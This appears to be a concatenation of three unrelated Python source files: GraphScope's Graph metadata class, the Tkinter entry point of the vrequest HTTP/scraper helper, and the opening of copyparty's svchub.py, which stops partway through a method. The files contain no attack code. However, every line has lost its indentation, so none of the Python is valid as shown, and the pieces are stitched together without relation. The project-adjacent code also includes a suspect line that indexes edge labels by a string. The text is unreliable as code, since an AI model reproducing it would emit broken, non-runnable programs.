# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import hashlib
import json
import logging
import threading
from copy import deepcopy
from typing import Mapping
import vineyard
from graphscope.client.session import get_default_session
from graphscope.config import GSConfig as gs_config
from graphscope.framework import dag_utils
from graphscope.framework import graph_utils
from graphscope.framework import utils
from graphscope.framework.errors import InvalidArgumentError
from graphscope.framework.errors import check_argument
from graphscope.framework.graph_schema import GraphSchema
from graphscope.framework.graph_utils import EdgeLabel
from graphscope.framework.graph_utils import EdgeSubLabel
from graphscope.framework.graph_utils import VertexLabel
from graphscope.framework.operation import Operation
from graphscope.proto import types_pb2
logger = logging.getLogger("graphscope")
class Graph(object):
"""A class for representing metadata of a graph in the GraphScope.
A :class:`Graph` object holds the metadata of a graph, such as key, schema, and the graph is directed or not.
It is worth noting that the graph is stored by the backend such as Analytical Engine, Vineyard.
In other words, the graph object holds nothing but metadata.
The following example demonstrates its usage:
.. code:: python
>>> import graphscope as gs
>>> from graphscope.framework.loader import Loader
>>> sess = gs.session()
>>> graph = Graph(sess)
>>> graph = graph.add_vertices("person.csv","person")
>>> graph = graph.add_vertices("software.csv", "software")
>>> graph = graph.add_edges("knows.csv", "knows", src_label="person", dst_label="person")
>>> graph = graph.add_edges("created.csv", "created", src_label="person", dst_label="software")
>>> print(graph)
>>> print(graph.schema)
"""
def __init__(
self,
session=None,
incoming_data=None,
oid_type="int64",
directed=True,
generate_eid=True,
):
"""Construct a :class:`Graph` object.
Args:
session_id (str): Session id of the session the graph is created in.
incoming_data: Graph can be initialized through various type of sources,
which can be one of:
- :class:`Operation`
- :class:`nx.Graph`
- :class:`Graph`
- :class:`vineyard.Object`, :class:`vineyard.ObjectId` or :class:`vineyard.ObjectName`
"""
self._key = None
self._graph_type = types_pb2.ARROW_PROPERTY
self._vineyard_id = 0
self._schema = GraphSchema()
if session is None:
session = get_default_session()
self._session = session
self._detached = False
self._interactive_instance_launching_thread = None
self._interactive_instance_list = []
self._learning_instance_list = []
# Hold uncompleted operation for lazy evaluation
self._pending_op = None
# Hold a reference to base graph of modify operation,
# to avoid being garbage collected
self._base_graph = None
oid_type = utils.normalize_data_type_str(oid_type)
if oid_type not in ("int64_t", "std::string"):
raise ValueError("oid_type can only be int64_t or string.")
self._oid_type = oid_type
self._directed = directed
self._generate_eid = generate_eid
self._unsealed_vertices = {}
self._unsealed_edges = {}
# Used to isplay schema without load into vineyard,
# and do sanity checking for newly added vertices and edges.
self._v_labels = []
self._e_labels = []
self._e_relationships = []
if incoming_data is not None:
# Don't import the :code:`NXGraph` in top-level statements to improve the
# performance of :code:`import graphscope`.
from graphscope.experimental import nx
if isinstance(incoming_data, Operation):
self._pending_op = incoming_data
if self._pending_op.type == types_pb2.PROJECT_GRAPH:
self._graph_type = types_pb2.ARROW_PROJECTED
elif isinstance(incoming_data, nx.Graph):
self._pending_op = self._from_nx_graph(incoming_data)
elif isinstance(incoming_data, Graph):
self._pending_op = self._copy_from(incoming_data)
elif isinstance(
incoming_data, (vineyard.Object, vineyard.ObjectID, vineyard.ObjectName)
):
self._pending_op = self._from_vineyard(incoming_data)
else:
raise RuntimeError("Not supported incoming data.")
def __del__(self):
# cleanly ignore all exceptions, cause session may already closed / destroyed.
try:
self.unload()
except Exception: # pylint: disable=broad-except
pass
def _close_interactive_instances(self):
# Close related interactive instances when graph unloaded.
# Since the graph is gone, quering via interactive client is meaningless.
for instance in self._interactive_instance_list:
instance.close()
self._interactive_instance_list.clear()
def _close_learning_instances(self):
for instance in self._learning_instance_list:
instance.close()
self._learning_instance_list.clear()
def _launch_interactive_instance_impl(self):
try:
self._session.gremlin(self)
except: # noqa: E722
# Record error msg in `InteractiveQuery` when launching failed.
# Unexpect and suppress all exceptions here.
pass
def _from_graph_def(self, graph_def):
check_argument(
self._graph_type == graph_def.graph_type, "Graph type doesn't match."
)
self._key = graph_def.key
self._vineyard_id = graph_def.vineyard_id
self._oid_type = graph_def.schema_def.oid_type
self._directed = graph_def.directed
self._generate_eid = graph_def.generate_eid
self._schema_path = graph_def.schema_path
self._schema.get_schema_from_def(graph_def.schema_def)
self._v_labels = self._schema.vertex_labels
self._e_labels = self._schema.edge_labels
self._e_relationships = self._schema.edge_relationships
def _ensure_loaded(self):
if self._key is not None and self._pending_op is None:
return
# Unloaded
if self._session is None:
raise RuntimeError("The graph is not loaded")
# Empty graph
if self._key is None and self._pending_op is None:
raise RuntimeError("Empty graph.")
# Try to load
if self._pending_op is not None:
# Create a graph from scratch.
graph_def = self._pending_op.eval()
self._from_graph_def(graph_def)
self._pending_op = None
self._base_graph = None
self._unsealed_vertices.clear()
self._unsealed_edges.clear()
# init saved_signature (must be after init schema)
self._saved_signature = self.signature
# create gremlin server pod asynchronously
if gs_config.initializing_interactive_engine:
self._interactive_instance_launching_thread = threading.Thread(
target=self._launch_interactive_instance_impl, args=()
)
self._interactive_instance_launching_thread.start()
@property
def key(self):
"""The key of the corresponding graph in engine."""
self._ensure_loaded()
return self._key
@property
def graph_type(self):
"""The type of the graph object.
Returns:
type (`types_pb2.GraphType`): the type of the graph.
"""
return self._graph_type
@property
def schema(self):
"""Schema of the graph.
Returns:
:class:`GraphSchema`: the schema of the graph
"""
self._ensure_loaded()
return self._schema
@property
def schema_path(self):
"""Path that Coordinator will write interactive schema path to.
Returns:
str: The path contains the schema. for interactive engine.
"""
self._ensure_loaded()
return self._schema_path
@property
def signature(self):
self._ensure_loaded()
return hashlib.sha256(
"{}.{}".format(self._schema.signature(), self._key).encode("utf-8")
).hexdigest()
@property
def template_str(self):
self._ensure_loaded()
# transform str/string to std::string
oid_type = utils.normalize_data_type_str(self._oid_type)
vid_type = self._schema.vid_type
vdata_type = utils.data_type_to_cpp(self._schema.vdata_type)
edata_type = utils.data_type_to_cpp(self._schema.edata_type)
if self._graph_type == types_pb2.ARROW_PROPERTY:
template = f"vineyard::ArrowFragment<{oid_type},{vid_type}>"
elif self._graph_type == types_pb2.ARROW_PROJECTED:
template = f"gs::ArrowProjectedFragment<{oid_type},{vid_type},{vdata_type},{edata_type}>"
elif self._graph_type == types_pb2.DYNAMIC_PROJECTED:
template = f"gs::DynamicProjectedFragment<{vdata_type},{edata_type}>"
else:
raise ValueError(f"Unsupported graph type: {self._graph_type}")
return template
@property
def vineyard_id(self):
"""Get the vineyard object_id of this graph.
Returns:
str: return vineyard id of this graph
"""
self._ensure_loaded()
return self._vineyard_id
@property
def session_id(self):
"""Get the currrent session_id.
Returns:
str: Return session id that the graph belongs to.
"""
return self._session.session_id
def detach(self):
"""Detaching a graph makes it being left in vineyard even when the varaible for
this :class:`Graph` object leaves the lexical scope.
The graph can be accessed using the graph's :code:`ObjectID` or its name later.
"""
self._detached = True
def loaded(self):
try:
self._ensure_loaded()
except RuntimeError:
return False
return self._key is not None
def __str__(self):
v_str = "\n".join([f"VERTEX: {label}" for label in self._v_labels])
relations = []
for i in range(len(self._e_labels)):
relations.extend(
[(self._e_labels[i], src, dst) for src, dst in self._e_relationships[i]]
)
e_str = "\n".join(
[f"EDGE: {label}\tsrc: {src}\tdst: {dst}" for label, src, dst in relations]
)
return f"graphscope.Graph\n{types_pb2.GraphType.Name(self._graph_type)}\n{v_str}\n{e_str}"
def __repr__(self):
return self.__str__()
def unload(self):
"""Unload this graph from graphscope engine."""
if self._session is None:
raise RuntimeError("The graph is not loaded")
if self._key is None:
self._session = None
self._pending_op = None
return
# close interactive instances first
try:
if (
self._interactive_instance_launching_thread is not None
and self._interactive_instance_launching_thread.is_alive()
):
# join raises a RuntimeError if an attempt is made to join the current thread.
# this exception occurs when a object collected by gc mechanism contains a running thread.
if (
threading.current_thread()
!= self._interactive_instance_launching_thread
):
self._interactive_instance_launching_thread.join()
self._close_interactive_instances()
except Exception as e:
logger.error("Failed to close interactive instances: %s" % e)
try:
self._close_learning_instances()
except Exception as e:
logger.error("Failed to close learning instances: %s" % e)
if not self._detached:
op = dag_utils.unload_graph(self)
op.eval()
self._key = None
self._session = None
self._pending_op = None
def project_to_simple(self, v_label="_", e_label="_", v_prop=None, e_prop=None):
"""Project a property graph to a simple graph, useful for analytical engine.
Will translate name represented label or property to index, which is broadedly used
in internal engine.
Args:
v_label (str, optional): vertex label to project. Defaults to "_".
e_label (str, optional): edge label to project. Defaults to "_".
v_prop (str, optional): vertex property of the v_label. Defaults to None.
e_prop (str, optional): edge property of the e_label. Defaults to None.
Returns:
:class:`Graph`: A `Graph` instance, which graph_type is `ARROW_PROJECTED`
"""
self._ensure_loaded()
check_argument(self.graph_type == types_pb2.ARROW_PROPERTY)
self._check_unmodified()
def check_out_of_range(id, length):
if id >= length or id < 0:
raise IndexError("id {} is out of range.".format(id))
try:
if isinstance(v_label, str):
v_label_id = self._schema.vertex_label_index(v_label)
else:
v_label_id = v_label
check_out_of_range(v_label_id, self._schema.vertex_label_num)
v_label = self._schema.vertex_labels[v_label_id]
if isinstance(e_label, str):
e_label_id = self._schema.edge_label_index(e_label)
else:
e_label_id = e_label
check_out_of_range(e_label_id, self._schema.edge_label_num)
e_label = self._schema.edge_labels[e_label]
except ValueError as e:
raise ValueError("Label does not exists.") from e
# Check relation v_label -> e_label <- v_label exists.
relation = (v_label, v_label)
if relation not in self._schema.edge_relationships[e_label_id]:
raise ValueError(
f"Graph doesn't contain such relationship: {v_label} -> {e_label} <- {v_label}."
)
try:
if v_prop is None:
v_prop_id = -1
vdata_type = None
else:
if isinstance(v_prop, str):
v_prop_id = self._schema.vertex_property_index(v_label_id, v_prop)
else:
v_prop_id = v_prop
properties = self._schema.vertex_properties[v_label_id]
check_out_of_range(v_prop_id, len(properties))
vdata_type = list(properties.values())[v_prop_id]
if e_prop is None:
e_prop_id = -1
edata_type = None
else:
if isinstance(e_prop, str):
e_prop_id = self._schema.edge_property_index(e_label_id, e_prop)
else:
e_prop_id = e_prop
properties = self._schema.edge_properties[e_label_id]
check_out_of_range(e_prop_id, len(properties))
edata_type = list(properties.values())[e_prop_id]
except ValueError as e:
raise ValueError("Property does not exists.") from e
oid_type = self._schema.oid_type
vid_type = self._schema.vid_type
op = dag_utils.project_arrow_property_graph(
self,
v_label_id,
v_prop_id,
e_label_id,
e_prop_id,
vdata_type,
edata_type,
oid_type,
vid_type,
)
return Graph(self._session, op)
def add_column(self, results, selector):
"""Add the results as a column to the graph. Modification rules are given by the selector.
Args:
results (:class:`Context`): A `Context` that created by doing a query.
selector (dict): Select results to add as column. Format is similar to selectors in `Context`
Returns:
:class:`Graph`: A new `Graph` with new columns.
"""
self._ensure_loaded()
check_argument(
isinstance(selector, Mapping), "selector of add column must be a dict"
)
check_argument(self.graph_type == types_pb2.ARROW_PROPERTY)
self._check_unmodified()
selector = {
key: results._transform_selector(value) for key, value in selector.items()
}
selector = json.dumps(selector)
op = dag_utils.add_column(self, results, selector)
return Graph(self._session, op)
def to_numpy(self, selector, vertex_range=None):
"""Select some elements of the graph and output to numpy.
Args:
selector (str): Select a portion of graph as a numpy.ndarray.
vertex_range(dict, optional): Slice vertices. Defaults to None.
Returns:
`numpy.ndarray`
"""
check_argument(self.graph_type == types_pb2.ARROW_PROPERTY)
self._ensure_loaded()
self._check_unmodified()
selector = utils.transform_labeled_vertex_property_data_selector(self, selector)
vertex_range = utils.transform_vertex_range(vertex_range)
op = dag_utils.graph_to_numpy(self, selector, vertex_range)
ret = op.eval()
return utils.decode_numpy(ret)
def to_dataframe(self, selector, vertex_range=None):
"""Select some elements of the graph and output as a pandas.DataFrame
Args:
selector (dict): Select some portions of graph.
vertex_range (dict, optional): Slice vertices. Defaults to None.
Returns:
`pandas.DataFrame`
"""
check_argument(self.graph_type == types_pb2.ARROW_PROPERTY)
self._ensure_loaded()
self._check_unmodified()
check_argument(
isinstance(selector, Mapping),
"selector of to_vineyard_dataframe must be a dict",
)
selector = {
key: utils.transform_labeled_vertex_property_data_selector(self, value)
for key, value in selector.items()
}
selector = json.dumps(selector)
vertex_range = utils.transform_vertex_range(vertex_range)
op = dag_utils.graph_to_dataframe(self, selector, vertex_range)
ret = op.eval()
return utils.decode_dataframe(ret)
def is_directed(self):
self._ensure_loaded()
return self._directed
def _check_unmodified(self):
self._ensure_loaded()
check_argument(
self.signature == self._saved_signature, "Graph has been modified!"
)
def _from_nx_graph(self, incoming_graph):
"""Create a gs graph from a nx graph.
Args:
incoming_graph (:class:`nx.graph`): A nx graph that contains graph data.
Returns:
that will be used to construct a gs.Graph
Raises:
TypeError: Raise Error if graph type not match.
Examples:
>>> nx_g = nx.path_graph(10)
>>> gs_g = gs.Graph(nx_g)
"""
if hasattr(incoming_graph, "_graph"):
msg = "graph view can not convert to gs graph"
raise TypeError(msg)
return dag_utils.dynamic_to_arrow(incoming_graph)
def _copy_from(self, incoming_graph):
"""Copy a graph.
Args:
incoming_graph (:class:`Graph`): Source graph to be copied from
Returns:
:class:`Graph`: An identical graph, but with a new vineyard id.
"""
check_argument(incoming_graph.graph_type == types_pb2.ARROW_PROPERTY)
check_argument(incoming_graph.loaded())
return dag_utils.copy_graph(incoming_graph)
def _from_vineyard(self, vineyard_object):
"""Load a graph from a already existed vineyard graph.
Args:
vineyard_object (:class:`vineyard.Object`, :class:`vineyard.ObjectID`
or :class:`vineyard.ObjectName`): vineyard object,
which represents a graph.
Returns:
A graph_def.
"""
if isinstance(vineyard_object, vineyard.Object):
return self._from_vineyard_id(vineyard_object.id)
if isinstance(vineyard_object, vineyard.ObjectID):
return self._from_vineyard_id(vineyard_object)
if isinstance(vineyard_object, vineyard.ObjectName):
return self._from_vineyard_name(vineyard_object)
def _from_vineyard_id(self, vineyard_id):
config = {}
config[types_pb2.IS_FROM_VINEYARD_ID] = utils.b_to_attr(True)
config[types_pb2.VINEYARD_ID] = utils.i_to_attr(int(vineyard_id))
# FIXME(hetao) hardcode oid/vid type for codegen, when loading from vineyard
#
# the metadata should be retrived from vineyard
config[types_pb2.OID_TYPE] = utils.s_to_attr("int64_t")
config[types_pb2.VID_TYPE] = utils.s_to_attr("uint64_t")
return dag_utils.create_graph(
self.session_id, types_pb2.ARROW_PROPERTY, attrs=config
)
def _from_vineyard_name(self, vineyard_name):
config = {}
config[types_pb2.IS_FROM_VINEYARD_ID] = utils.b_to_attr(True)
config[types_pb2.VINEYARD_NAME] = utils.s_to_attr(str(vineyard_name))
# FIXME(hetao) hardcode oid/vid type for codegen, when loading from vineyard
#
# the metadata should be retrived from vineyard
config[types_pb2.OID_TYPE] = utils.s_to_attr("int64_t")
config[types_pb2.VID_TYPE] = utils.s_to_attr("uint64_t")
return dag_utils.create_graph(
self.session_id, types_pb2.ARROW_PROPERTY, attrs=config
)
def _attach_interactive_instance(self, instance):
"""Store the instance when a new interactive instance is started.
Args:
instance: interactive instance
"""
self._interactive_instance_list.append(instance)
def _attach_learning_instance(self, instance):
"""Store the instance when a new learning instance is created.
Args:
instance: learning instance
"""
self._learning_instance_list.append(instance)
def save_to(self, path, **kwargs):
"""Serialize graph to a location.
The meta and data of graph is dumped to specified location,
and can be restored by `Graph.deserialize` in other sessions.
Each worker will write a `path_{worker_id}.meta` file and
a `path_{worker_id}` file to storage.
Args:
path (str): supported storages are local, hdfs, oss, s3
"""
import vineyard
import vineyard.io
self._ensure_loaded()
sess = self._session
deployment = "kubernetes" if sess.info["type"] == "k8s" else "ssh"
conf = sess.info["engine_config"]
vineyard_endpoint = conf["vineyard_rpc_endpoint"]
vineyard_ipc_socket = conf["vineyard_socket"]
if sess.info["type"] == "k8s":
hosts = [
"{}:{}".format(sess.info["namespace"], s)
for s in sess.info["engine_hosts"].split(",")
]
else: # type == "hosts"
hosts = sess.info["engine_hosts"].split(",")
vineyard.io.serialize(
path,
vineyard.ObjectID(self._vineyard_id),
type="global",
vineyard_ipc_socket=vineyard_ipc_socket,
vineyard_endpoint=vineyard_endpoint,
storage_options=kwargs,
deployment=deployment,
hosts=hosts,
)
@classmethod
def load_from(cls, path, sess, **kwargs):
"""Construct a `Graph` by deserialize from `path`.
It will read all serialization files, which is dumped by
`Graph.serialize`.
If any serialize file doesn't exists or broken, will error out.
Args:
path (str): Path contains the serialization files.
sess (`graphscope.Session`): The target session
that the graph will be construct in
Returns:
`Graph`: A new graph object. Schema and data is supposed to be
identical with the one that called serialized method.
"""
import vineyard
import vineyard.io
deployment = "kubernetes" if sess.info["type"] == "k8s" else "ssh"
conf = sess.info["engine_config"]
vineyard_endpoint = conf["vineyard_rpc_endpoint"]
vineyard_ipc_socket = conf["vineyard_socket"]
if sess.info["type"] == "k8s":
hosts = [
"{}:{}".format(sess.info["namespace"], s)
for s in sess.info["engine_hosts"].split(",")
]
else: # type == "hosts"
hosts = sess.info["engine_hosts"].split(",")
graph_id = vineyard.io.deserialize(
path,
type="global",
vineyard_ipc_socket=vineyard_ipc_socket,
vineyard_endpoint=vineyard_endpoint,
storage_options=kwargs,
deployment=deployment,
hosts=hosts,
)
return cls(sess, vineyard.ObjectID(graph_id))
def draw(self, vertices, hop=1):
"""Visualize the graph data in the result cell when the draw functions are invoked
Args:
vertices (list): selected vertices.
hop (int): draw induced subgraph with hop extension. Defaults to 1.
Returns:
A GraphModel.
"""
from ipygraphin import GraphModel
self._ensure_loaded()
interactive_query = self._session.gremlin(self)
graph = GraphModel()
graph.queryGraphData(vertices, hop, interactive_query)
# listen on the 1~2 hops operation of node
graph.on_msg(graph.queryNeighbor)
return graph
def _construct_graph(
self, vertices, edges, v_labels, e_labels, e_relations, mutation_func=None
):
"""Construct graph.
1. Construct a graph from scratch.
If the vertices and edges is empty, return a empty graph.
2. Construct a graph from existed builded graph.
If the vertices and edges is empty, return a copied graph.
Args:
vertices ([type]): [description]
edges ([type]): [description]
v_labels ([type]): [description]
e_labels ([type]): [description]
e_relations ([type]): [description]
mutation_func ([type], optional): [description]. Defaults to None.
Returns:
[type]: [description]
"""
config = graph_utils.assemble_op_config(
vertices.values(),
edges.values(),
self._oid_type,
self._directed,
self._generate_eid,
)
# edge case.
if not vertices and not edges:
if mutation_func:
# Rely on `self._key`
return Graph(self._session, self)
else:
return Graph(
self._session,
None,
self._oid_type,
self._directed,
self._generate_eid,
)
if mutation_func:
op = mutation_func(self, attrs=config)
else:
op = dag_utils.create_graph(
self.session_id, types_pb2.ARROW_PROPERTY, attrs=config
)
graph = Graph(
self._session, op, self._oid_type, self._directed, self._generate_eid
)
graph._unsealed_vertices = vertices
graph._unsealed_edges = edges
graph._v_labels = v_labels
graph._e_labels = e_labels
graph._e_relationships = e_relations
# propage info about whether is a loaded graph.
# graph._key = self._key
if mutation_func:
graph._base_graph = self._base_graph or self
return graph
def add_vertices(self, vertices, label="_", properties=[], vid_field=0):
is_from_existed_graph = len(self._unsealed_vertices) != len(
self._v_labels
) or len(self._unsealed_edges) != len(self._e_labels)
if label in self._v_labels:
raise ValueError(f"Label {label} already existed in graph.")
if not self._v_labels and self._e_labels:
raise ValueError("Cannot manually add vertices after inferred vertices.")
unsealed_vertices = deepcopy(self._unsealed_vertices)
unsealed_vertices[label] = VertexLabel(
label=label, loader=vertices, properties=properties, vid_field=vid_field
)
v_labels = deepcopy(self._v_labels)
v_labels.append(label)
# Load after validity check and before create add_vertices op.
# TODO(zsy): Add ability to add vertices and edges to existed graph simultaneously.
if is_from_existed_graph and self._unsealed_edges:
self._ensure_loaded()
func = dag_utils.add_vertices if is_from_existed_graph else None
return self._construct_graph(
unsealed_vertices,
self._unsealed_edges,
v_labels,
self._e_labels,
self._e_relationships,
func,
)
def add_edges(
self,
edges,
label="_",
properties=[],
src_label=None,
dst_label=None,
src_field=0,
dst_field=1,
):
"""Add edges to graph.
1. Add edges to a uninitialized graph.
i. src_label and dst_label both unspecified. In this case, current graph must
has 0 (we deduce vertex label from edge table, and set vertex label name to '_'),
or 1 vertex label (we set src_label and dst label to this).
ii. src_label and dst_label both specified and existed in current graph's vertex labels.
iii. src_label and dst_label both specified and there is no vertex labels in current graph.
we deduce all vertex labels from edge tables.
Note that you either provide all vertex labels, or let graphscope deduce all vertex labels.
We don't support mixed style.
2. Add edges to a existed graph.
Must add a new kind of edge label, not a new relation to builded graph.
But you can add a new relation to uninitialized part of the graph.
src_label and dst_label must be specified and existed in current graph.
Args:
edges ([type]): [description]
label (str, optional): [description]. Defaults to "_".
properties ([type], optional): [description]. Defaults to None.
src_label ([type], optional): [description]. Defaults to None.
dst_label ([type], optional): [description]. Defaults to None.
src_field (int, optional): [description]. Defaults to 0.
dst_field (int, optional): [description]. Defaults to 1.
Raises:
RuntimeError: [description]
Returns:
Graph: [description]
"""
is_from_existed_graph = len(self._unsealed_vertices) != len(
self._v_labels
) or len(self._unsealed_edges) != len(self._e_labels)
if is_from_existed_graph:
if label in self._e_labels and label not in self._unsealed_edges:
raise ValueError("Cannot add new relation to existed graph.")
if src_label is None or dst_label is None:
raise ValueError("src label and dst label cannot be None.")
if src_label not in self._v_labels or dst_label not in self._v_labels:
raise ValueError("src label or dst_label not existed in graph.")
else:
if src_label is None and dst_label is None:
check_argument(len(self._v_labels) <= 1, "ambiguous vertex label")
if len(self._v_labels) == 1:
src_label = dst_label = self._v_labels[0]
else:
src_label = dst_label = "_"
elif src_label is not None and dst_label is not None:
if self._v_labels:
if (
src_label not in self._v_labels
or dst_label not in self._v_labels
):
raise ValueError("src label or dst_label not existed in graph.")
else:
# Infer all v_labels from edge tables.
pass
else:
raise ValueError(
"src and dst label must be both specified or either unspecified."
)
check_argument(
src_field != dst_field, "src and dst field cannot refer to the same field"
)
unsealed_edges = deepcopy(self._unsealed_edges)
e_labels = deepcopy(self._e_labels)
relations = deepcopy(self._e_relationships)
if label in unsealed_edges:
assert label in self._e_labels
label_idx = self._e_labels.index(label)
# Will check conflict in `add_sub_label`
relations[label_idx].append((src_label, dst_label))
cur_label = unsealed_edges[label]
else:
e_labels.append(label)
relations.append([(src_label, dst_label)])
cur_label = EdgeLabel(label)
cur_label.add_sub_label(
EdgeSubLabel(edges, properties, src_label, dst_label, src_field, dst_field)
)
unsealed_edges[label] = cur_label
# Load after validity check and before create add_vertices op.
# TODO(zsy): Add ability to add vertices and edges to existed graph simultaneously.
if is_from_existed_graph and self._unsealed_vertices:
self._ensure_loaded()
func = dag_utils.add_edges if is_from_existed_graph else None
return self._construct_graph(
self._unsealed_vertices,
unsealed_edges,
self._v_labels,
e_labels,
relations,
func,
)
def remove_vertices(self, label):
if label not in self._v_labels:
raise ValueError(f"label {label} not in vertices.")
if label not in self._unsealed_vertices:
raise ValueError(
"Remove vertices from a loaded graph doesn't supported yet"
)
# Check whether safe to remove
for rel in self._e_relationships:
for sub_rel in rel:
if label in sub_rel:
raise ValueError(
f"Vertex {label} has usage in relation {sub_rel}, please remove that edge first."
)
unsealed_vertices = deepcopy(self._unsealed_vertices)
v_labels = deepcopy(self._v_labels)
unsealed_vertices.pop(label)
v_labels.remove(label)
return self._construct_graph(
unsealed_vertices,
self._unsealed_edges,
v_labels,
self._e_labels,
self._e_relationships,
)
def remove_edges(self, label, src_label=None, dst_label=None):
if label not in self._e_labels:
raise ValueError(f"label {label} not in edges")
if label not in self._unsealed_edges:
raise ValueError("Remove edges from a loaded graph doesn't supported yet")
unsealed_edges = deepcopy(self._unsealed_edges)
e_labels = deepcopy(self._e_labels)
relations = deepcopy(self._e_relationships)
# Calculate the items to remove
remove_list = []
label_idx = e_labels.index(label)
for rel in relations[label_idx]:
for sub_rel in rel:
if src_label is None or src_label == sub_rel[0]:
if dst_label is None or dst_label == sub_rel[1]:
remove_list.append(sub_rel)
if not remove_list:
raise ValueError("Cannot find edges to remove.")
# Remove the edge label
if src_label is None and dst_label is None:
unsealed_edges.pop(label)
e_labels.pop(label_idx)
relations.pop(label_idx)
else:
cur_label = unsealed_edges[label]
for sub_rel in remove_list:
cur_label.sub_labels.pop(sub_rel)
relations[label_idx].remove(sub_rel)
# Remove entire label if no relations still exists.
if not relations[label_idx]:
unsealed_edges.pop(label)
e_labels.pop(label_idx)
relations.pop(label_idx)
return self._construct_graph(
self._unsealed_vertices, unsealed_edges, self._v_labels, e_labels, relations
)
def g(incoming_data):
return Graph(incoming_data=incoming_data)
|
main.py | import os
import sys
from . import __version__
from .root import (
root,
config,
change_siz,
tails,
)
from .menu import bind_menu
from .tab import (
nb,
bind_frame,
delete_curr_tab,
cancel_delete,
create_new_reqtab,
create_new_rsptab,
create_helper,
change_tab_name,
send_request,
save_config,
switch_response_log,
create_test_code,
create_scrapy_code,
get_html_pure_text,
get_xpath_elements,
get_auto_xpath,
get_auto_json,
choice_auto_json,
execute_code,
execute_scrapy_code,
create_js_parse,
create_selenium_parse,
create_temp_idle,
create_encoder,
create_test_code_urllib,
)
from .combinekey import (
bind_ctl_key,
bind_alt_key,
)
# 这里的框架就是目前需要设计处理的图形内容
from .frame import (
helper_window,
request_window,
)
# === 初始化 ===
settings = config['set']
if not settings:
create_helper()
else:
for key,setting in settings.items():
if setting.get('type') == 'request':
tab_id = bind_frame(request_window(setting),key)
if key == config['focus']:
nb.select(tab_id) # 保持最后执行成功时的 tab 焦点
# === 创建/删除/帮助 ===
# 绑定右键菜单
bind_menu(create_new_reqtab, '创建请求标签 [Ctrl+q]')
bind_menu(delete_curr_tab, '删除当前标签 [Ctrl+w]')
bind_menu(change_tab_name, '改当前标签名 [Ctrl+e]')
bind_menu(save_config, '保存配置快照 [Ctrl+s]')
bind_menu(create_js_parse, '创建 js解析页 [Ctrl+j]')
bind_menu(create_helper, '帮助文档标签 [Ctrl+h]')
bind_menu(create_selenium_parse, '创建便捷浏览器执行窗')
bind_menu(create_encoder, '创建便捷加密编码窗口')
# 绑定 Ctrl + key 的组合键
bind_ctl_key(create_new_reqtab, 'q')
bind_ctl_key(delete_curr_tab, 'w')
# 撤销 ctrl + shift + w (必须是保存过的配置,并且撤销队列在程序关闭后就清空)
bind_ctl_key(cancel_delete, 'w',shift=True)
bind_ctl_key(change_tab_name, 'e')
bind_ctl_key(save_config, 's')
bind_ctl_key(send_request, 'r')
bind_ctl_key(create_helper, 'h')
bind_ctl_key(create_js_parse, 'j')
# 绑定 response 事件
bind_alt_key(create_new_rsptab, 'r')
bind_alt_key(create_test_code, 'c') # 生成代码
bind_alt_key(get_html_pure_text, 'd') # 获取文本
bind_alt_key(get_xpath_elements, 'x') # 获取xpath
bind_alt_key(get_auto_xpath, 'f') # 解析路径xpath
bind_alt_key(get_auto_json, 'z') # 分析json列表
bind_alt_key(choice_auto_json, 'q') # 选则json列表
bind_alt_key(execute_code, 'v') # 代码执行
bind_alt_key(create_scrapy_code, 's') # 生成scrapy代码
bind_alt_key(execute_scrapy_code, 'w') # 用自动生成的环境执行scrapy代码
bind_alt_key(create_temp_idle, '`') # 使用临时的idle文本
bind_alt_key(create_test_code_urllib, 'u') # 生成 urllib(py3) 请求的代碼
def algo():
from .frame import encode_window
fr = encode_window()
ico = os.path.join(os.path.split(__file__)[0],'ico.ico')
fr.iconbitmap(ico)
fr.title('命令行输入 ee 则可快速打开便捷加密窗口(为防冲突,输入vv e也可以打开), 组合快捷键 Alt+` 快速打开IDLE')
fr.bind('<Escape>',lambda *a:fr.master.quit())
fr.bind('<Alt-`>',lambda *a:create_temp_idle())
fr.protocol("WM_DELETE_WINDOW",lambda *a:fr.master.quit())
fr.master.withdraw()
fr.mainloop()
escodegen = None
def execute():
argv = sys.argv
if 'e' in argv:
algo()
return
def preimport():
global escodegen
import time
time.sleep(.5) # 需要花点时间导包的部分,用别的线程进行预加载,增加工具顺滑度
try: import js2py
except: pass
try: import execjs
except: pass
try:
import js2py.py_node_modules.escodegen as escodegen
except: pass
import threading
threading.Thread(target=preimport).start()
root.title('vrequest [{}]'.format(__version__))
ico = os.path.join(os.path.split(__file__)[0],'ico.ico')
root.iconbitmap(ico)
root.geometry(config.get('siz') or '600x725+100+100')
root.bind('<Configure>',lambda e:change_siz())
root.bind('<Escape>',lambda e:switch_response_log())
def quit_():
try:
for tail in tails:
try:
tail()
except:
import traceback
print(traceback.format_exc())
finally:
root.destroy()
root.protocol("WM_DELETE_WINDOW",lambda *a: quit_())
root.mainloop()
if __name__ == '__main__':
execute() |
svchub.py | # coding: utf-8
from __future__ import print_function, unicode_literals
import os
import sys
import time
import shlex
import string
import signal
import socket
import threading
from datetime import datetime, timedelta
import calendar
from .__init__ import E, PY2, WINDOWS, ANYWIN, MACOS, VT100, unicode
from .util import mp, start_log_thrs, start_stackmon, min_ex, ansi_re
from .authsrv import AuthSrv
from .tcpsrv import TcpSrv
from .up2k import Up2k
from .th_srv import ThumbSrv, HAVE_PIL, HAVE_WEBP
class SvcHub(object):
"""
Hosts all services which cannot be parallelized due to reliance on monolithic resources.
Creates a Broker which does most of the heavy stuff; hosted services can use this to perform work:
hub.broker.put(want_reply, destination, args_list).
Either BrokerThr (plain threads) or BrokerMP (multiprocessing) is used depending on configuration.
Nothing is returned synchronously; if you want any value returned from the call,
put() can return a queue (if want_reply=True) which has a blocking get() with the response.
"""
def __init__(self, args, argv, printed):
self.args = args
self.argv = argv
self.logf = None
self.stop_req = False
self.stopping = False
self.stop_cond = threading.Condition()
self.httpsrv_up = 0
self.log_mutex = threading.Lock()
self.next_day = 0
self.log = self._log_disabled if args.q else self._log_enabled
if args.lo:
self._setup_logfile(printed)
if args.stackmon:
start_stackmon(args.stackmon, 0)
if args.log_thrs:
start_log_thrs(self.log, args.log_thrs, 0)
if not ANYWIN and not args.use_fpool:
args.no_fpool = True
if not args.no_fpool and args.j != 1:
m = "WARNING: --use-fpool combined with multithreading is untested and can probably cause undefined behavior"
if ANYWIN:
m = "windows cannot do multithreading without --no-fpool, so enabling that -- note that upload performance will suffer if you have microsoft defender \"real-time protection\" enabled, so you probably want to use -j 1 instead"
args.no_fpool = True
self.log("root", m, c=3)
